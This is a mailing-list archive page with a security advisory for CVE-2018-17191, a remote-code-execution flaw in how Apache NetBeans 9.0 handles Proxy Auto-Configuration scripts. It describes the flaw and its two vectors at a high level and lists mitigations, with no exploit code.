Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [day] [month] [year] [list]
Date: Sun, 30 Dec 2018 13:48:52 +0100
From: Matthias Bläsing <>
Cc:, Moritz Bechler <>,,
Subject: [CVE-2018-17191] Apache NetBeans 9.0 Proxy Auto-Configuration (PAC)
 interpretation is vulnerable for remote command execution (RCE)


NetBeans Proxy Auto-Configuration (PAC) interpretation
is vulnerable for remote command execution (RCE)

Versions Affected: 
- Apache NetBeans (incubating) 9.0
- NetBeans releases before the Apache transition started may be
  also affected

To be vulnerable to the issue, the system running NetBeans needs to be
configured to use Proxy Auto-Configuration (PAC), NetBeans must be
configured to use the system proxy settings and the attacker needs to
be able to modify the PAC script.

Proxy Auto-Configuration (PAC) allows a proxy provider to provide the
client with an automatic configuration of the proxy configuration. The
configuration is not a static description, but JavaScript code, that
calculates the proxy information based on the URL requested.

Depending on the Java Version NetBeans is executed, two vectors exists:

If the Java Version supports the Nashorn JavaScript engine, execution
was sandboxed by limiting the classes accessible to the script. It was
found, that, due to the vulnerability in the JRE, the sandbox can be
circumvented. This allows arbitrary code to be executed in the context 
of the NetBeans application.

If the Java Version does not support Nashorn, a generic JavaScript
engine was used, which is not further restricted. This allows execution
of arbitrary code in the context of the NetBeans application.


The issue can be mitigated utilizing one of the following options:

- Upgrade to Apache NetBeans 10.0
- Disable Proxy Auto-Configuration for the whole OS
  (please refer to the system documentation how to do that)
- Disable "Use System Proxy Settings" in the NetBeans Options and
  configure the Proxy to use manually

The issue was identified by Moritz Bechler.

Download attachment "signature.asc" of type "application/pgp-signature" (834 bytes)

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.